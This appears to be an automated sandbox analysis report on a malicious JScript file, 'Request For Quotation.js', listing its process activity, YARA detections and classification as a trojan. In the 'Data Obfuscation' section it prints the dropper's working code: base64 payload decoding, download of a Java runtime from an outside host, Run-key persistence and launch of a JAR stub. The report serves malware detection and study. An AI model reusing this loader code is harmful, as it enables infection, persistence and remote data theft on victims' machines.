Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57938 version: TLS 1.2

System Summary

Source: 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1544D597 1_3_1544D597
Source: Request For Quotation.js Initial sample: Strings found which are bigger than 50
Source: 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal100.troj.evad.winJS@6/4@9/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\bszhidta.txt
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Request For Quotation.js Virustotal: Detection: 14%
Source: Request For Quotation.js ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request For Quotation.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bszhidta.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR
Source: Request For Quotation.js String: entropy: 5.59, length: 205460, content: 'dmF{1}I{0}5lbTQ0Ow0KdmF{1}I{0}xvbmdUZXh0ID0gIlVFc0RCQlElITxDJSE8Z0klITxDcTh0MWclITwlITwlITwlITwlITw
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15453B8D push esp; retf 1_3_15453B8E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546CB44 push eax; retf 1_3_1546CB45
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15478240 pushad ; ret 1_3_15478241
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_154781C8 pushad ; ret 1_3_154781C9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546FE6B push 486ECF49h; retf 1_3_1546FF2D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C270 push eax; ret 1_3_1546C271
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C8F8 pushad ; retf 1_3_1546C90D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_15478180 pushad ; ret 1_3_15478181
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1546C288 pushad ; ret 1_3_1546C289
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278D8F7 push 00000000h; mov dword ptr [esp], esp 1_2_0278D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278A21B push ecx; ret 1_2_0278A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278A20A push ecx; ret 1_2_0278A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278BB67 push 00000000h; mov dword ptr [esp], esp 1_2_0278BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278B3B7 push 00000000h; mov dword ptr [esp], esp 1_2_0278B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278D8E0 push 00000000h; mov dword ptr [esp], esp 1_2_0278D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278B947 push 00000000h; mov dword ptr [esp], esp 1_2_0278B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0278C477 push 00000000h; mov dword ptr [esp], esp 1_2_0278C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_02829091 push cs; retf 1_2_028290B1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000000.00000003.1740296993.0000014A21D92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!<%!<%.B6
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000000.00000003.1740296993.0000014A21D92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C%!<gI
Source: javaw.exe, 00000001.00000002.3032808529.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.3032808529.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000003.1741586011.0000000014CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.3032808529.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_027963B4 LdrInitializeThunk, 1_2_027963B4
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bszhidta.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_027803C0 cpuid 1_2_027803C0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\3300 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\3608lock.file VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR